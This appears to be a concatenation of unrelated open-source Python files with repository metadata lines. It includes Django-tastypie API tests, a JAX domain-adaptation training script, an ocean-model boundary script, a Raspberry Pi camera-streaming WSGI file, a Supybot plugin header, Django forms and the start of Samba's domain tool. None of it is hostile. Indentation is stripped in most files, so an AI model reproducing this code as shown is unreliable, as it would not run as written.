request.GET = {'format': 'json'}
request.method = 'PUT'
data['dogs'][0]['bones'][0]['color'] = 'gray'
body = json.dumps(data)
request.set_body(body)
request.path = reverse('api_dispatch_detail', kwargs={'pk': pk, 'resource_name': pr._meta.resource_name, 'api_name': pr._meta.api_name})
resp = pr.put_detail(request, pk=pk)
self.assertEqual(resp.status_code, 204)
self.assertEqual(Bone.objects.count(), 1)
bone = Bone.objects.all()[0]
self.assertEqual(bone.color, 'gray')
class RelatedSaveCallsTest(TestCaseWithFixture):
urls = 'related_resource.api.urls'
def test_one_query_for_post_list(self):
"""
Posting a new detail with no related objects
should require one query to save the object
"""
resource = api.canonical_resource_for('category')
request = MockRequest()
body = json.dumps({
'name': 'Foo',
'parent': None
})
request.set_body(body)
with self.assertNumQueries(1):
resource.post_list(request)
def test_two_queries_for_post_list(self):
"""
        Posting a new detail with one related object, referenced via its
        ``resource_uri``, should require two queries: one to save the
        object, and one to look up the related object.
"""
parent = Category.objects.create(name='Bar')
resource = api.canonical_resource_for('category')
request = MockRequest()
body = json.dumps({
'name': 'Foo',
'parent': resource.get_resource_uri(parent)
})
request.set_body(body)
with self.assertNumQueries(2):
resource.post_list(request)
def test_no_save_m2m_unchanged(self):
"""
Posting a new detail with a related m2m object shouldn't
save the m2m object unless the m2m object is provided inline.
"""
def _save_fails_test(sender, **kwargs):
self.fail("Should not have saved Label")
pre_save.connect(_save_fails_test, sender=Label)
l1 = Label.objects.get(name='coffee')
resource = api.canonical_resource_for('post')
label_resource = api.canonical_resource_for('label')
request = MockRequest()
body = json.dumps({
'name': 'test post',
'label': [label_resource.get_resource_uri(l1)],
})
request.set_body(body)
resource.post_list(request) # _save_fails_test will explode if Label is saved
def test_save_m2m_changed(self):
"""
Posting a new or updated detail object with a related m2m object
should save the m2m object if it's included inline.
"""
resource = api.canonical_resource_for('tag')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
body_dict = {
'name': 'school',
'taggabletags': [{'extra': 7}]
}
request.set_body(json.dumps(body_dict))
with self.assertNumQueries(4):
resp = resource.wrap_view('dispatch_list')(request)
self.assertEqual(resp.status_code, 201)
# 'extra' should have been set
tag = Tag.objects.all()[0]
taggable_tag = tag.taggabletags.all()[0]
self.assertEqual(taggable_tag.extra, 7)
body_dict['taggabletags'] = [{'extra': 1234}]
request.set_body(json.dumps(body_dict))
request.path = reverse('api_dispatch_detail', kwargs={
'pk': tag.pk,
'resource_name': resource._meta.resource_name,
'api_name': resource._meta.api_name
})
with self.assertNumQueries(5):
resource.put_detail(request)
# 'extra' should have changed
tag = Tag.objects.all()[0]
taggable_tag = tag.taggabletags.all()[0]
self.assertEqual(taggable_tag.extra, 1234)
def test_no_save_m2m_unchanged_existing_data_persists(self):
"""
Data should persist when posting an updated detail object with
unchanged reverse related objects.
"""
person = Person.objects.create(name='Ryan')
dog = Dog.objects.create(name='Wilfred', owner=person)
bone1 = Bone.objects.create(color='White', dog=dog)
bone2 = Bone.objects.create(color='Grey', dog=dog)
self.assertEqual(dog.bones.count(), 2)
resource = api.canonical_resource_for('dog')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request._load_post_and_files = lambda *args, **kwargs: None
body_dict = {
'id': dog.id,
'name': 'Wilfred',
'bones': [
{'id': bone1.id, 'color': bone1.color},
{'id': bone2.id, 'color': bone2.color}
]
}
request.set_body(json.dumps(body_dict))
with self.assertNumQueries(13 if django.VERSION >= (1, 9) else 14):
resp = resource.wrap_view('dispatch_detail')(request, pk=dog.pk)
self.assertEqual(resp.status_code, 204)
dog = Dog.objects.all()[0]
dog_bones = dog.bones.all()
self.assertEqual(len(dog_bones), 2)
self.assertEqual(dog_bones[0], bone1)
self.assertEqual(dog_bones[1], bone2)
def test_no_save_m2m_related(self):
"""
When saving an object with a M2M field, don't save that related object's related objects.
"""
cg1 = ContactGroup.objects.create(name='The Inebriati')
cg2 = ContactGroup.objects.create(name='The Stone Cutters')
c1 = Contact.objects.create(name='foo')
c2 = Contact.objects.create(name='bar')
c2.groups.add(cg1, cg2)
c3 = Contact.objects.create(name='baz')
c3.groups.add(cg1)
self.assertEqual(list(c1.groups.all()), [])
self.assertEqual(list(c2.groups.all()), [cg1, cg2])
self.assertEqual(list(c3.groups.all()), [cg1])
data = {
'name': c1.name,
'groups': [reverse('api_dispatch_detail', kwargs={'api_name': 'v1', 'resource_name': 'contactgroup', 'pk': cg1.pk})],
}
resource = api.canonical_resource_for('contact')
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'PUT'
request._load_post_and_files = lambda *args, **kwargs: None
request.set_body(json.dumps(data))
with self.assertNumQueries(8):
response = resource.wrap_view('dispatch_detail')(request, pk=c1.pk)
self.assertEqual(response.status_code, 204, response.content)
new_contacts = Contact.objects.all()
new_c1 = new_contacts[0]
new_c2 = new_contacts[1]
new_c3 = new_contacts[2]
self.assertEqual(new_c1.name, c1.name)
self.assertEqual(new_c1.id, c1.id)
self.assertEqual(list(new_c1.groups.all()), [cg1])
self.assertEqual(new_c2.id, c2.id)
self.assertEqual(list(new_c2.groups.all()), [cg1, cg2])
self.assertEqual(new_c3.id, c3.id)
self.assertEqual(list(new_c3.groups.all()), [cg1])
new_cg1 = ContactGroup.objects.get(id=cg1.id)
new_cg2 = ContactGroup.objects.get(id=cg2.id)
self.assertEqual(list(new_cg1.members.all()), [new_c1, new_c2, new_c3])
self.assertEqual(list(new_cg2.members.all()), [new_c2])
class CorrectUriRelationsTestCase(TestCaseWithFixture):
"""
    Validate that incorrect URIs (with PKs that line up to valid data) are not
    accepted.
"""
urls = 'related_resource.api.urls'
def test_incorrect_uri(self):
self.assertEqual(Note.objects.count(), 2)
nr = NoteResource()
# For this test, we need a ``User`` with the same PK as a ``Note``.
note_1 = Note.objects.latest('created')
User.objects.create(
id=note_1.pk,
username='valid',
            email='valid@example.com',
password='junk'
)
data = {
# This URI is flat-out wrong (wrong resource).
# This should cause the request to fail.
'author': '/v1/notes/{0}/'.format(
note_1.pk
),
'title': 'Nopenopenope',
'slug': 'invalid-request',
'content': "This shouldn't work.",
'is_active': True,
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
with self.assertRaises(NotFound) as cm:
nr.post_list(request)
self.assertEqual(str(cm.exception), "An incorrect URL was provided '/v1/notes/2/' for the 'UserResource' resource.")
self.assertEqual(Note.objects.count(), 2)
class PrefetchRelatedTests(TestCase):
def setUp(self):
self.forum = Forum.objects.create()
self.resource = api.canonical_resource_for('forum')
self.user_data = [
{
'username': 'valid but unique',
                'email': 'valid.unique@example.com',
'password': 'junk',
},
{
'username': 'valid and very unique',
                'email': 'valid.very.unique@example.com',
'password': 'junk',
},
{
'username': 'valid again',
                'email': 'valid.very.unique@example.com',
'password': 'junk',
},
]
def tearDown(self):
usernames = [data['username'] for data in self.user_data]
User.objects.filter(username__in=usernames).delete()
self.forum.delete()
def make_request(self, method):
request = MockRequest()
request.GET = {'format': 'json'}
request.method = method
request.set_body(json.dumps({
'members': [
self.user_data[0],
self.user_data[1],
],
'moderators': [self.user_data[2]],
}))
request.path = reverse('api_dispatch_detail', kwargs={
'pk': self.forum.pk,
'resource_name': self.resource._meta.resource_name,
'api_name': self.resource._meta.api_name
})
return request
def test_m2m_put(self):
request = self.make_request('PUT')
response = self.resource.put_detail(request)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content.decode('utf-8'))
# Check that the query does what it's supposed to
# and only the return value is wrong
self.assertEqual(User.objects.count(), 3)
self.assertEqual(len(data['members']), 2)
self.assertEqual(len(data['moderators']), 1)
def test_m2m_patch(self):
request = self.make_request('PATCH')
response = self.resource.patch_detail(request)
self.assertEqual(response.status_code, 202)
data = json.loads(response.content.decode('utf-8'))
# Check that the query does what it's supposed to
# and only the return value is wrong
self.assertEqual(User.objects.count(), 3)
self.assertEqual(len(data['members']), 2)
self.assertEqual(len(data['moderators']), 1)
class ModelWithReverseItemsRelationshipTest(TestCase):
def test_reverse_items_relationship(self):
order_resource = OrderResource()
data = {
'name': 'order1',
'items': [
{
'name': 'car',
},
{
'name': 'yacht',
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.path = reverse('api_dispatch_list',
kwargs={'resource_name': order_resource._meta.resource_name,
'api_name': order_resource._meta.api_name})
request.set_body(json.dumps(data))
resp = order_resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderItem.objects.count(), 2)
class OneToOneTestCase(TestCase):
def test_reverse_one_to_one_post(self):
ed = ExtraData.objects.create(name='ed_name')
resource = TagResource()
# Post the extradata element which is attached to a "reverse" OneToOne
request = MockRequest()
request.method = "POST"
request.body = json.dumps({
"name": "tag_name",
"tagged": [],
"extradata": "/v1/extradata/%s/" % ed.pk
})
resp = resource.post_list(request)
# Assert that the status code is CREATED
self.assertEqual(resp.status_code, 201)
tag = Tag.objects.get(pk=int(resp['Location'].split("/")[-2]))
self.assertEqual(tag.extradata, ed)
|
ocadotechnology/django-tastypie
|
tests/related_resource/tests.py
|
Python
|
bsd-3-clause
| 39,916
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FixMatch with Distribution Alignment and Adaptative Confidence Ratio.
"""
import os
import sys
from typing import Callable
import jax
import jax.numpy as jn
import objax
from absl import app
from absl import flags
from absl.flags import FLAGS
from objax.functional import softmax
from objax.typing import JaxArray
from semi_supervised.lib.data import MixData, CTAData
from semi_supervised.lib.train import TrainableSSLModule
from shared.data.fsl import DATASETS as FSL_DATASETS
from shared.data.ssl import DATASETS as SSL_DATASETS, DataSetSSL
from shared.train import ScheduleCos
from shared.util import setup_tf, MyParallel
from shared.zoo.models import network, ARCHS
class MCD(TrainableSSLModule):
def __init__(self, nclass: int, model: Callable, **kwargs):
super().__init__(nclass, kwargs)
self.model: objax.Module = model(colors=3, nclass=nclass, **kwargs)
self.model_ema = objax.optimizer.ExponentialMovingAverageModule(self.model, momentum=0.999)
if FLAGS.arch.endswith('pretrain'):
# Initialize weights of EMA with pretrained model's weights.
self.model_ema.ema.momentum = 0
self.model_ema.update_ema()
self.model_ema.ema.momentum = 0.999
self.c1: objax.Module = self.model[-1]
self.c2: objax.Module = objax.nn.Linear(self.c1.w.value.shape[0], nclass)
self.gen: objax.Module = self.model[:-1]
self.opt1 = objax.optimizer.Momentum(self.gen.vars() + self.c1.vars('c1') + self.c2.vars('c2'))
self.opt2 = objax.optimizer.Momentum(self.c1.vars('c1') + self.c2.vars('c2'))
self.opt3 = objax.optimizer.Momentum(self.gen.vars())
self.lr = ScheduleCos(self.params.lr, self.params.lr_decay)
@objax.Function.with_vars(self.model_ema.vars())
def eval_op(x: JaxArray) -> JaxArray:
return objax.functional.softmax(self.model_ema(x, training=False))
def get_two_outputs(v):
feat = self.gen(v, training=True)
return self.c1(feat), self.c2(feat)
def loss_function_phase1(x, y):
x1, x2 = get_two_outputs(x[:, 0])
xes = (objax.functional.loss.cross_entropy_logits(x1, y).mean() +
objax.functional.loss.cross_entropy_logits(x2, y).mean())
return xes, {'losses/xe': xes}
def loss_function_phase2(x, u, y):
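            # Snapshot the generator variables so the two forward passes below
            # do not permanently mutate generator state (likely BatchNorm
            # running statistics) during this classifier-only phase; the
            # snapshot is restored right after.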
saved = self.gen.vars().tensors()
x1, x2 = get_two_outputs(x[:, 0])
u1, u2 = get_two_outputs(u[:, 0])
self.gen.vars().assign(saved)
xes = (objax.functional.loss.cross_entropy_logits(x1, y).mean() +
objax.functional.loss.cross_entropy_logits(x2, y).mean())
dis = jn.abs(softmax(u1) - softmax(u2)).mean()
return xes - dis, {'losses/xe2': xes, 'losses/dis2': dis}
def loss_function_phase3(u):
u1, u2 = get_two_outputs(u[:, 0])
dis = jn.abs(softmax(u1) - softmax(u2)).mean()
return dis, {'losses/dis3': dis}
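        # Three training phases, wired to the three optimizers below:
        #   phase 1 updates generator + both classifiers on labeled
        #   cross-entropy; phase 2 updates only the classifiers, keeping the
        #   labeled loss low while maximizing their disagreement on unlabeled
        #   data (xes - dis); phase 3 updates only the generator, for `wu`
        #   steps, to minimize that disagreement.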
gv1 = objax.GradValues(loss_function_phase1, self.gen.vars() + self.c1.vars('c1') + self.c2.vars('c2'))
gv2 = objax.GradValues(loss_function_phase2, self.c1.vars('c1') + self.c2.vars('c2'))
gv3 = objax.GradValues(loss_function_phase3, self.gen.vars())
@objax.Function.with_vars(self.vars())
def train_op(step, x, y, u, probe=None):
y_probe = eval_op(probe) if probe is not None else None
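            # Fraction of training completed: train_mimg << 20 converts
            # mega-images to images (assuming `step` counts images).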
p = step / (FLAGS.train_mimg << 20)
lr = self.lr(p)
g, v1 = gv1(x, y)
self.opt1(lr, objax.functional.parallel.pmean(g))
g, v2 = gv2(x, u, y)
self.opt2(lr, objax.functional.parallel.pmean(g))
v3 = {}
for _ in range(self.params.wu):
g, v = gv3(u)
for k, val in v[1].items():
v3[k] = v3.get(k, 0) + val / self.params.wu
self.opt3(lr, objax.functional.parallel.pmean(g))
self.model_ema.update_ema()
            return objax.functional.parallel.pmean({'monitors/lr': lr, **v1[1], **v2[1], **v3}), y_probe
self.train_op = MyParallel(train_op, reduce=lambda x: x)
self.eval_op = MyParallel(eval_op)
def main(argv):
del argv
print('JAX host: %d / %d' % (jax.host_id(), jax.host_count()))
print('JAX devices:\n%s' % '\n'.join(str(d) for d in jax.devices()), flush=True)
setup_tf()
dataset_name, samples_per_class, dataset_seed = DataSetSSL.parse_name(f'{FLAGS.dataset}')
labeled = SSL_DATASETS()[dataset_name](samples_per_class, dataset_seed)
unlabeled = FSL_DATASETS()[f'{dataset_name}-0']()
testsets = [unlabeled.test]
module = MCD(labeled.nclass, network(FLAGS.arch),
lr=FLAGS.lr,
lr_decay=FLAGS.lr_decay,
wd=FLAGS.wd,
arch=FLAGS.arch,
batch=FLAGS.batch,
wu=FLAGS.wu,
uratio=FLAGS.uratio)
logdir = f'SSL/{FLAGS.dataset}/{FLAGS.augment}/{module.__class__.__name__}/%s' % (
'_'.join(sorted('%s%s' % k for k in module.params.items())))
logdir = os.path.join(FLAGS.logdir, logdir)
test = {}
for domain, testset in enumerate(testsets):
test.update((k, v.parse().batch(FLAGS.batch).nchw().map(lambda d: {**d, 'domain': domain}).prefetch(16))
for k, v in testset.items())
if FLAGS.augment.startswith('('):
train = MixData(labeled.train, unlabeled.train, labeled.nclass, FLAGS.batch, FLAGS.uratio)
elif FLAGS.augment.startswith('CTA('):
train = CTAData(labeled.train, unlabeled.train, labeled.nclass, FLAGS.batch, FLAGS.uratio)
else:
raise ValueError(f'Augment flag value {FLAGS.augment} not supported.')
module.train(FLAGS.train_mimg << 10, FLAGS.report_kimg, train, test, logdir, FLAGS.keep_ckpts)
train.stop()
objax.util.multi_host_barrier()
if __name__ == '__main__':
flags.DEFINE_enum('arch', 'wrn28-2', ARCHS, 'Model architecture.')
flags.DEFINE_float('lr', 0.03, 'Learning rate.')
flags.DEFINE_float('lr_decay', 0.25, 'Learning rate decay.')
flags.DEFINE_float('wd', 0.001, 'Weight decay.')
flags.DEFINE_integer('wu', 1, 'Iteration for phase3 (unlabeled weight loss for G).')
flags.DEFINE_integer('batch', 64, 'Batch size')
flags.DEFINE_integer('uratio', 3, 'Unlabeled batch size ratio')
flags.DEFINE_integer('report_kimg', 64, 'Reporting period in kibi-images.')
flags.DEFINE_integer('train_mimg', 8, 'Training duration in mega-images.')
flags.DEFINE_integer('keep_ckpts', 5, 'Number of checkpoints to keep (0 for all).')
flags.DEFINE_string('logdir', 'experiments', 'Directory where to save checkpoints and tensorboard data.')
flags.DEFINE_string('dataset', 'domainnet32_infograph(10,seed=1)', 'Data to train on.')
FLAGS.set_default('augment', 'CTA(sm,sm,probe=1)')
FLAGS.set_default('para_augment', 8)
app.run(main)
|
google-research/adamatch
|
semi_supervised/mcd.py
|
Python
|
apache-2.0
| 7,580
|
# -*- coding: utf-8 -*-
"""
Program to make bry nc file
okada on 2014/10/21
"""
import numpy as np
import pandas as pd
def ramp(zeta):
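    # Blend linearly from a constant 150.0 toward the observed zeta over the
    # first 744 records (744 may correspond to 31 days of hourly data; that
    # reading is an assumption). Records beyond index 744 are left untouched.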
for i in xrange(744):
zeta[i] = zeta[i] * i / 744.0 + 150.0 * (1.0 - i / 744.0)
return zeta
def bry_zeta(dims, zetafile):
print 'bry_zeta:', zetafile
xi_rho = dims['xi']
eta_rho = dims['eta']
    zeta = pd.read_csv(zetafile, index_col='date')
for name in zeta.columns.values:
zeta[name] = ramp(zeta[name].values)
print zeta
th = len(zeta)
zeta_out = {}
zeta_out['w'] = np.ndarray(shape=[th, eta_rho])
zeta_out['s'] = np.ndarray(shape=[th, xi_rho])
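    # Western boundary ('w'): blend the 'ei' and 'tk' columns (values appear
    # to be in cm, hence the /100.0) linearly between eta=68 and eta=121.
    # The southern boundary ('s') blends 'nu' and 'ka' between xi=2 and xi=67.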
for eta in xrange(eta_rho):
tk = zeta.tk.values / 100.0
ei = zeta.ei.values / 100.0
if eta < 68:
zeta_out['w'][:, eta] = ei
elif eta > 121:
zeta_out['w'][:, eta] = tk
else:
a = eta - 68
b = 121 - eta
zeta_out['w'][:, eta] = (a*tk + b*ei) / (a+b)
for xi in xrange(xi_rho):
ka = zeta.ka.values / 100.0
nu = zeta.nu.values / 100.0
if xi < 2:
zeta_out['s'][:, xi] = nu
elif 67 < xi:
zeta_out['s'][:, xi] = ka
else:
a = xi - 2
b = 67 - xi
zeta_out['s'][:, xi] = (a*ka + b*nu) / (a+b)
return zeta_out
if __name__ == '__main__':
HOME = ''
dims = {'xi':117, 'eta':124, 's':20}
zetafile = 'F:/okada/Dropbox/Data/zeta_op_2012.csv'
zeta = bry_zeta(dims, zetafile)
def plot():
import matplotlib.pyplot as plt
#plt.pcolor(zeta['s'][:200,:])
plt.plot(zeta['w'][:200,68])
plt.plot(zeta['w'][:200,120])
plt.plot(zeta['s'][:200,3])
plt.plot(zeta['s'][:200,67])
plt.show()
plot()
|
okadate/romspy
|
romspy/make/boundary/bry_zeta.py
|
Python
|
mit
| 1,889
|
"""
WSGI config for pacemPI project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pacemPI.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
def on_startup():
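    # Capture a 640x480 JPEG every 50 ms with raspistill into /tmp/stream,
    # then serve that file over HTTP via mjpg-streamer's input_file and
    # output_http plugins. Both long-running commands are backgrounded.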
os.system("mkdir /tmp/stream 2> /dev/null")
os.system("raspistill -w 640 -h 480 -q 20 -o /tmp/stream/pic.jpg -tl 50 -t 99999999 2> /dev/null &")
os.system("""sudo cp /home/pi/mjpg-streamer-code-182/mjpg-streamer/output_http.so /home/pi/mjpg-streamer-code-182/mjpg-streamer/input_file.so /usr/local/lib/ 2>/dev/null""")
os.system("""LD_LIBRARY_PATH=/usr/local/lib mjpg_streamer -i "input_file.so -f /tmp/stream -n pic.jpg" -o "output_http.so -w /usr/local/www" &""")
on_startup()
|
AngelTsanev/pacemPI
|
pacemPI/wsgi.py
|
Python
|
mit
| 906
|
###
# Copyright (c) 2004-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Basic channel management commands. Many of these commands require their caller
to have the <channel>.op capability. This plugin is loaded by default.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {
supybot.authors.skorobeus: ['enable', 'disable'],
}
import config
import plugin
reload(plugin) # In case we're being reloaded.
if world.testing:
import test
Class = plugin.Class
configure = config.configure
|
tecan/xchat-rt
|
plugins/scripts/Supybot-0.83.4.1-bitcoinotc-bot/plugins/Channel/__init__.py
|
Python
|
gpl-2.0
| 2,341
|
import os,shutil
from datetime import datetime,timedelta
class create_cms2_files:
def __init__(self,time,cmsdir='',nproc=4,outdir='%Y/%m/%d/%H%M/',tempmodel='model1',axi=[],pol=[],start=1):
"""Sets up initial variables to pass to rest of create_model_cms_files functions.
Really only need to set the input time string "YYYY/MM/DD HH:MM:SS" and possibly the path to the CMS2 directory (assuming you downloaded git repo in cms2 directory then cmsdir vairable already).
Then assuming you set up the sigmoid directory to be YYYY/MM/DD/HHMM (can change with outdir variable if needed) you are set."""
if cmsdir == '': cmsdir = open('cms2_dir','r').readlines()[0][:-1]#read in first line of cms2_dir and format to send to script
if cmsdir[-1] != '/': cmsdir=cmsdir+'/'
self.time = time
self.nproc = nproc
self.sform = '%Y/%m/%d %H:%M:%S'
self.dttime = datetime.strptime(self.time,self.sform)
self.basedir = datetime.strftime(self.dttime,outdir)
self.cmsdir = cmsdir
self.tempmodel = tempmodel # template model
self.axi = axi
self.pol = pol
self.start = start
#Potential model parameters
def setup_file(self):
template = self.cmsdir+self.basedir+self.tempmodel+'_setup'
for i in range(self.start,self.nparam):
#make sure template is not the same file as copying to
if template != self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+'_setup':
shutil.copy(template,self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+'_setup')
#copy path files after 1st one is complete
def path_file(self):
#get number of lines in file
pathf = open(self.cmsdir+self.basedir+self.tempmodel+"_path",'r')
flines = len(pathf.readlines())
        #initialize text variable
pathtxt = ""
#path for fluxrope file
pathf = open(self.cmsdir+self.basedir+self.tempmodel+"_path",'r')
#loop through file and create large text block
for j,i in enumerate(pathf):
#if j == 1: i = i[:-12]+'{0}'+'\n'
if ((j == flines-2) | (j == flines-3)):i = i[:-12]+'{1:6.5e}\n'
if (j == 1): i = i[:25]+' {0:6.5e}\n'
pathtxt = pathtxt+i
#model parameters
        if len(self.pol) == 0:
            self.pol = ['1.00000E9','5.00000E9','1.00000E10','5.00000E10','1.00000E11']
        #Updated per conversation with antonia 2017/04/03
        if len(self.axi) == 0:
            self.axi = ['1.00000e19','3.00000e19','5.00000e19','7.00000e19','9.00000e19','1.00000e20','3.00000e20','5.00000e20','7.00000e20','9.00000e20','1.00000e21','1.50000e21']
i = self.start
for p in self.pol:
for a in self.axi:
run = True
#remove early 7E20 models for some reason unknown to me
if ((float(p) < 9e9) & (a == '7.00000e20')): run = False
if run:
files = open(self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+"_path",'w')
files.write(pathtxt.format(float(p),float(a)))
files.close()
i+=1
self.nparam = i #get number of models to create
#text format for input file
def model_input(self):
modin = self.basedir+"\n"
modin = modin+"11 \n"
modin = modin+"model{0} \n"
modin = modin+"0 \n"
modin = modin+"100 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"model{0} \n"
modin = modin+"100 \n"
modin = modin+"900 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.003 \n"
modin = modin+"model{0} \n"
modin = modin+"1000 \n"
modin = modin+"9000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.001 \n"
modin = modin+"model{0} \n"
modin = modin+"10000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0003 \n"
modin = modin+"model{0} \n"
modin = modin+"20000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"30000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"40000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"50000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"60000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"70000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"80000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
# what to write out the file as
filetime = datetime.strftime(self.dttime,'input%y%m%d%H%M%S_mod')
#create input files
for i in range(self.start,self.nparam):
files = open(self.cmsdir+self.basedir+filetime+"{0}.dat".format(str(i)),'w')
files.write(modin.format(str(i)))
files.close()
#run creation on all files
def create_all_files(self):
self.path_file()
self.setup_file()
self.model_input()
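# Minimal usage sketch (hypothetical time and cmsdir; assumes the
# YYYY/MM/DD/HHMM sigmoid directory layout described in the class docstring):
# maker = create_cms2_files('2017/04/03 12:00:00', cmsdir='/path/to/cms2/')
# maker.create_all_files()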
|
jprchlik/cms2_python_helpers
|
create_model_files.py
|
Python
|
mit
| 7,124
|
from django import forms
from falta.models import *
from cfar.utils import *
class JustificativaForm(forms.ModelForm):
class Meta:
model = Justificativa
fields = ('url','tipo_justificativa','faltas')
class AntecipacaoForm(forms.ModelForm):
class Meta:
model = Antecipacao
fields = ('agendamento', 'url', 'horarios')
class ReposicaoForm(forms.ModelForm):
class Meta:
model = Reposicao
fields = ('agendamento', 'url', 'faltas')
class AgendamentoForm(forms.ModelForm):
class Meta:
model = Agendamento
fields = ('tipo','dia', 'materia_corrente')
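# Minimal usage sketch (hypothetical view code; the concrete fields come from
# the cfar models, which are not shown here):
# form = AgendamentoForm(request.POST)
# if form.is_valid():
#     agendamento = form.save()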
|
diaspa-nds/cfar
|
falta/forms.py
|
Python
|
gpl-2.0
| 655
|
# domain management
#
# Copyright Matthias Dieter Wallnoefer 2009
# Copyright Andrew Kroeger 2009
# Copyright Jelmer Vernooij 2007-2012
# Copyright Giampaolo Lauria 2011
# Copyright Matthieu Patou <mat@matws.net> 2011
# Copyright Andrew Bartlett 2008-2015
# Copyright Stefan Metzmacher 2012
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
from __future__ import division
import samba.getopt as options
import ldb
import os
import sys
import ctypes
import random
import tempfile
import logging
import subprocess
import time
import shutil
from samba import ntstatus
from samba import NTSTATUSError
from samba import werror
from getpass import getpass
from samba.net import Net, LIBNET_JOIN_AUTOMATIC
from samba import enable_net_export_keytab
import samba.ntacls
from samba.join import join_RODC, join_DC
from samba.auth import system_session
from samba.samdb import SamDB, get_default_backend_store
from samba.ndr import ndr_pack, ndr_print
from samba.dcerpc import drsuapi
from samba.dcerpc import drsblobs
from samba.dcerpc import lsa
from samba.dcerpc import netlogon
from samba.dcerpc import security
from samba.dcerpc import nbt
from samba.dcerpc import misc
from samba.dcerpc.samr import DOMAIN_PASSWORD_COMPLEX, DOMAIN_PASSWORD_STORE_CLEARTEXT
from samba.netcmd import (
Command,
CommandError,
SuperCommand,
Option
)
from samba.netcmd.fsmo import get_fsmo_roleowner
from samba.netcmd.common import netcmd_get_domain_infos_via_cldap
from samba.samba3 import Samba3
from samba.samba3 import param as s3param
from samba.upgrade import upgrade_from_samba3
from samba.drs_utils import drsuapi_connect
from samba import remove_dc, arcfour_encrypt, string_to_byte_array
from samba.auth_util import system_session_unix
from samba.dsdb import (
DS_DOMAIN_FUNCTION_2000,
